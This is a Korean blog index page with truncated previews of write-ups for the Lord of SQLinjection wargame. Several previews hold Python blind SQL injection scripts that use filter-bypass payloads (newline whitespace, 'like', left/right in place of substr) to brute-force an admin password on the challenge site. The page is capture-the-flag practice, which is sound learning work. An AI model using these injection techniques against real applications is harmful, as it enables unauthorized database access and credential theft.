분류 전체보기(150)
-
(los[Lord of SQLinjection]) BUGBEAR
import requests password = "" for k in range(1, 20): url = "https://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?no=1%0a||%0aid%0ain%0a(%22admin%22)%0a%26%26%0alength(pw)%0ain%0a(" + str(k)+ ")" r = requests.post(url, cookies=(dict(PHPSESSID="dj88169ielhc1qeiqs7jkhckv7"))) print("try password length = " + str(k)) if 'Hello admin' in r.text: print("[+] find password length = " ..
2020.04.23 -
(los[Lord of SQLinjection]) DARKNIGHT
import requests password = "" for k in range(1, 20): url = "https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?pw=&no=1 or id like %22admin%22 and length(pw) like " + str(k) r = requests.post(url, cookies=(dict(PHPSESSID="2o4ge7l7skce4kl1qhl8kkq404"))) print("try password length = " + str(k)) if 'Hello admin' in r.text: print("[+] find password length = " + str(k)) for j ..
2020.04.23 -
(los[Lord of SQLinjection]) GOLEM
substr이 필터링 당했다면 left 함수와 right 함수를 섞어서 사용함으로써 우회가 가능하다. 두 함수는 각각 1번째 인자로 들어온 값을 왼쪽, 오른쪽으로부터 2번째 인자로 들어온 값 만큼 잘라내는 함수이다. 이를 혼합해서 아래의 예제처럼 substr 함수를 대신할 수 있는 것이다. select right(left('asd',1),1) = 'a' select right(left('asd',2),1) = 's' select right(left('asd',3),1) = 'd' import requests password = "" for k in range(1, 20): url = "https://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.p..
2020.04.23 -
(los[Lord of SQLinjection]) SKELETOM 2020.04.23
-
(los[Lord of SQLinjection]) VAMPIRE 2020.04.23
-
(los[Lord of SQLinjection]) TROLL
@ereg 함수 검색 대상 문자열(string)에서 정규 표현식으로 나타낸 패턴(pattern)과 일치하는 문자열이 발견될 경우에 true를, 발견되지 않을 경우에는 false를 반환한다. 이때 대소문자는 구분한다.
2020.04.23